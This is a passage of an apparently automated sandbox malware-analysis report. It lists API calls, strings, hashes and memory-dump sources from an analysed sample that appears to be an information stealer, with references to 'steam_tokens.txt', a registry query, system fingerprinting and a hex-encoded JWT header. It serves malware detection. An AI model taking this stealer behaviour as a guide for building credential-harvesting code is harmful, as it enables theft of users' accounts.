                                • lstrlen.KERNEL32(00000000), ref: 009CED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 009CED52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: 52e3a701df67218b90305ece6d0014be7f37b17703d1a9591bb771923fa1cb93
                                • Instruction ID: 08c1e280d063907e97862d2ea7aba86ed819f9a2c1c16bb7129952bf6b45a813
                                • Opcode Fuzzy Hash: 52e3a701df67218b90305ece6d0014be7f37b17703d1a9591bb771923fa1cb93
                                • Instruction Fuzzy Hash: 55318E31A105555BC722BFB8EE4ABAE77A8EF84320F054024B847EB292DF20DC0587D2
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,009B140E), ref: 009B9A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,009B140E), ref: 009B9AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,009B140E), ref: 009B9AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,009B140E,00000000,?,?,?,009B140E), ref: 009B9AE0
                                • LocalFree.KERNEL32(?,?,?,?,009B140E), ref: 009B9B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,009B140E), ref: 009B9B07
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: e2a3ce0dc79952b6c75bb135266fa660098058e077e933cf319e3b71324d09d5
                                • Instruction ID: d465f7e4ab9f47dcfde123468ae04f1c4ad3f36d4ce82454232ce336e9fb0cbd
                                • Opcode Fuzzy Hash: e2a3ce0dc79952b6c75bb135266fa660098058e077e933cf319e3b71324d09d5
                                • Instruction Fuzzy Hash: 6B112171610219AFD710DFA9DDC4AEA776CEB05750F104559FA15EB180DB709D40CBA1
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009D5B14
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA188
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 009D5B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 009D5B89
                                • memmove.MSVCRT(00000000,?,?), ref: 009D5B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: aab5785cafe26601ab8ee8f4b7ea02d3a29e27e55b4549d03d4563b0c32d243e
                                • Instruction ID: 44e4745a6980aea8d1d969eab96cb87a0ce23dbf595c2e041f89dccf0464ad7a
                                • Opcode Fuzzy Hash: aab5785cafe26601ab8ee8f4b7ea02d3a29e27e55b4549d03d4563b0c32d243e
                                • Instruction Fuzzy Hash: 12417F71B005199FCF18DF6CC995AAEBBB5EB88310F15C22AE909E7384D634DD00CB90
                                APIs
                                Strings
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Typememset
                                • String ID:
                                • API String ID: 3530896902-3916222277
                                • Opcode ID: c9494f1919883b305b809733ba6ec083568498476708f822fe77f9085e922eed
                                • Instruction ID: 373db6b8286e45e79647a6137073cb6b07fc3ea366625856942fce1af2cb70af
                                • Opcode Fuzzy Hash: c9494f1919883b305b809733ba6ec083568498476708f822fe77f9085e922eed
                                • Instruction Fuzzy Hash: CB413B7054475C9EDB319B648C85FFBBBFC9B45304F1484E9EA9687282E2719A448F20
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009C7D58
                                  • Part of subcall function 009DA1C0: std::exception::exception.LIBCMT ref: 009DA1D5
                                  • Part of subcall function 009DA1C0: std::exception::exception.LIBCMT ref: 009DA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 009C7D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 009C7D91
                                Strings
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: 2630ecae9f18376909b5a15c6f051c0d30e6f96bc453b276d984c238c4c90cb9
                                • Instruction ID: 4f549ae1d141c10f7aa24a222ac2e0e3489095669079ab062859852381edffcb
                                • Opcode Fuzzy Hash: 2630ecae9f18376909b5a15c6f051c0d30e6f96bc453b276d984c238c4c90cb9
                                • Instruction Fuzzy Hash: BF21A5327082019BD721DEACD891F3AF7E9AFD1764F204A6EE4528B391D771DC408B66
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009D33EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D33F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 009D3411
                                • wsprintfA.USER32 ref: 009D3437
                                Strings
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB
                                • API String ID: 2922868504-2651807785
                                • Opcode ID: c4d1869b6c7f8a6f43479898e14c669f84fb2faa7ad991fcb99f604974cc22bd
                                • Instruction ID: b291faaf53c9aa474a5c20a30607bc53497bb2a21f00dc9506d1b28c5e414154
                                • Opcode Fuzzy Hash: c4d1869b6c7f8a6f43479898e14c669f84fb2faa7ad991fcb99f604974cc22bd
                                • Instruction Fuzzy Hash: A5014C71A40244AFDB14DF98CC45BAEB7BCFB44711F00852AF906EB380DB745D0086A2
                                APIs
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlenmemset
                                • String ID:
                                • API String ID: 3212139465-0
                                • Opcode ID: 33651cca351a91f8ba40dfd85d266c06886e0e02ac260e80ed929043f5bff788
                                • Instruction ID: 5b28d067f55eaa2915b7f2615c6160c1508a16c011ca2ad136cbf79a84dc447b
                                • Opcode Fuzzy Hash: 33651cca351a91f8ba40dfd85d266c06886e0e02ac260e80ed929043f5bff788
                                • Instruction Fuzzy Hash: CF81D5B1E402069BDB14DF94DC84BAEB7B9EFA4300F14C06AE908A7381EB359D45CF90
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 009C7F31
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C7F60
                                • StrCmpCA.SHLWAPI(00000000,009E4C3C), ref: 009C7FA5
                                • StrCmpCA.SHLWAPI(00000000,009E4C3C), ref: 009C7FD3
                                • StrCmpCA.SHLWAPI(00000000,009E4C3C), ref: 009C8007
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 1d99e8de00bb418aad68ad074d22eded8d5ff8f449807358a90a1672430318f7
                                • Instruction ID: 862cd77e3623f18bf9414a967c97b4c22a6b99546fe2a863a496b6407b3c378b
                                • Opcode Fuzzy Hash: 1d99e8de00bb418aad68ad074d22eded8d5ff8f449807358a90a1672430318f7
                                • Instruction Fuzzy Hash: B8417C3090411ADFCB21DFA9D8C4EAEB7B8FF54300B11459DE806AB251DB74AA65CF92
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 009C80BB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C80EA
                                • StrCmpCA.SHLWAPI(00000000,009E4C3C), ref: 009C8102
                                • lstrlen.KERNEL32(00000000), ref: 009C8140
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 009C816F
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 8a66fccf1886bc6b385c8edfed3eca6c2e3da4d90613bcaf5c1e3803bc7d7000
                                • Instruction ID: e718c818a75c69244094fd35a5d0228c7f0a9ce90239c350c84b98e9f45390aa
                                • Opcode Fuzzy Hash: 8a66fccf1886bc6b385c8edfed3eca6c2e3da4d90613bcaf5c1e3803bc7d7000
                                • Instruction Fuzzy Hash: 7C419E71A00106ABDB21DF68DA88FABBBF8EF44310F15845DA849D7245EF34DD45CB91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009D3166
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D316D
                                • RegOpenKeyExA.ADVAPI32(80000002,010BBCC8,00000000,00020119,?), ref: 009D318C
                                • RegQueryValueExA.ADVAPI32(?,010CDAD0,00000000,00000000,00000000,000000FF), ref: 009D31A7
                                • RegCloseKey.ADVAPI32(?), ref: 009D31B1
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: f45526d3f25876b6d0de9b7347e7eee3b010b4ef18b4fe87a6f5427ac7bc1fa5
                                • Instruction ID: 15eb69c1e50a844f853a9891a0727ff612eb739184da7c07440b09e26e89a182
                                • Opcode Fuzzy Hash: f45526d3f25876b6d0de9b7347e7eee3b010b4ef18b4fe87a6f5427ac7bc1fa5
                                • Instruction Fuzzy Hash: A9118276A40245AFD710CF95EC85FBBB7BCE744711F10421AFA09D7380DB7459048BA1
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009B8996
                                  • Part of subcall function 009DA1C0: std::exception::exception.LIBCMT ref: 009DA1D5
                                  • Part of subcall function 009DA1C0: std::exception::exception.LIBCMT ref: 009DA1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 009B89CD
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA188
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA1AE
                                Strings
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: invalid string position$string too long
                                • API String ID: 2002836212-4289949731
                                • Opcode ID: 6a010678f86a95fa5c69b1564547743b87c8d69f308d22db446abb9a3ad89144
                                • Instruction ID: e5c3f043cedebb0f0afb012e1e22f351ee7b484797d1665f21e8d6a120d8b0b6
                                • Opcode Fuzzy Hash: 6a010678f86a95fa5c69b1564547743b87c8d69f308d22db446abb9a3ad89144
                                • Instruction Fuzzy Hash: 4221E5723006519BCB219AACE940AABF7ADDBE57B1B25093FF141CB281CA71DC41C7A5
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009B8883
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA188
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: a46371f2b3256f9751a80e6fcd43cdfec84153a0abc15103ffaf40339835dcc1
                                • Instruction ID: 963c7dee075ee0ec0796d3614c63b9d8a2cdfbbbd036f6c09fe1399ce1b45828
                                • Opcode Fuzzy Hash: a46371f2b3256f9751a80e6fcd43cdfec84153a0abc15103ffaf40339835dcc1
                                • Instruction Fuzzy Hash: 8B3195B5E005159BCB08DF58C9916AEBBB6EBC8350F18C269E915AB384DB30AD01CB91
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009D5922
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA188
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA1AE
                                • std::_Xinvalid_argument.LIBCPMT ref: 009D5935
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_std::exception::exception
                                • String ID: Sec-WebSocket-Version: 13$string too long
                                • API String ID: 1928653953-3304177573
                                • Opcode ID: 86229bd204d59a8b757cb8a91f89a33043b18e6f194ab61c99f460523e95f07d
                                • Instruction ID: 3c360cbeb6ff65d3ae0ce554384f9008fd31d77dd6773ac06f11453174794d33
                                • Opcode Fuzzy Hash: 86229bd204d59a8b757cb8a91f89a33043b18e6f194ab61c99f460523e95f07d
                                • Instruction Fuzzy Hash: FB117C34348B41CBC7228F2CE810B1AB7E5ABD5760FA64A5BE0D187795CBB1DC41CBA5
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,009DA430,000000FF), ref: 009D3D20
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D3D27
                                • wsprintfA.USER32 ref: 009D3D37
                                  • Part of subcall function 009D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009D71FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: f0225e837f02c00963599a15909e509b4ebfd8bc53768931b4ed8fc0a223f6c8
                                • Instruction ID: ba3ba1cfa653efa5a0c994d8482f6fa3fb9bcc37de2529051d0b256dced8ce77
                                • Opcode Fuzzy Hash: f0225e837f02c00963599a15909e509b4ebfd8bc53768931b4ed8fc0a223f6c8
                                • Instruction Fuzzy Hash: 99010071680780BBE7209B94DC8AF6ABB68FB45B22F400115FA059B3D0CBB41900CBA1
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 009B8737
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA188
                                  • Part of subcall function 009DA173: std::exception::exception.LIBCMT ref: 009DA1AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long$yxxx$yxxx
                                • API String ID: 2002836212-1517697755
                                • Opcode ID: 4a21ed51d5240dc956fc98c864093c62aee66565f65846af8ca6c7df88c636c1
                                • Instruction ID: 4fbffcb6dc9be16b8a5cc728563e40a619d3361caa078d6a49bc1c146d36cdae
                                • Opcode Fuzzy Hash: 4a21ed51d5240dc956fc98c864093c62aee66565f65846af8ca6c7df88c636c1
                                • Instruction Fuzzy Hash: FEF09027B040220F8314643E8EC44DFA94E56E93A433AD765E81AEF359DC70EC82C5D4
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009CE544
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CE573
                                • lstrcat.KERNEL32(?,00000000), ref: 009CE581
                                • lstrcat.KERNEL32(?,010CDCF0), ref: 009CE59C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: ef3f017eb10d4f5e69dff99a70af3253cc834f554dde42c9e81e40e7d0f06e76
                                • Instruction ID: 902a2677588304540137b20b01d0c6a165dfb5f8ae27efc8cbb8dbf5a9c7bfcd
                                • Opcode Fuzzy Hash: ef3f017eb10d4f5e69dff99a70af3253cc834f554dde42c9e81e40e7d0f06e76
                                • Instruction Fuzzy Hash: E751C9B5A10108AFCB55EF64ED82FEE337DEBC8310F444459B91A9B351DE70AE448BA1
                                APIs
                                Strings
                                • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 009D1FDF, 009D1FF5, 009D20B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: strlen
                                • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                • API String ID: 39653677-4138519520
                                • Opcode ID: e03f46f36392d27c764f996c61efa8b4a25083e7571a03d45a216eec57086af8
                                • Instruction ID: 4f1f9d5acc38e5a56c8f5b8968e614c8f21c5738f43e1dbb7a72b3ddfac5ce93
                                • Opcode Fuzzy Hash: e03f46f36392d27c764f996c61efa8b4a25083e7571a03d45a216eec57086af8
                                • Instruction Fuzzy Hash: 712137399942898FDB20EB35C4446DDF36BEF947A2F84C867C8194B381E3361D0AD796
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009CEBB4
                                • lstrcpy.KERNEL32(00000000,?), ref: 009CEBE3
                                • lstrcat.KERNEL32(?,00000000), ref: 009CEBF1
                                • lstrcat.KERNEL32(?,010CECF0), ref: 009CEC0C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
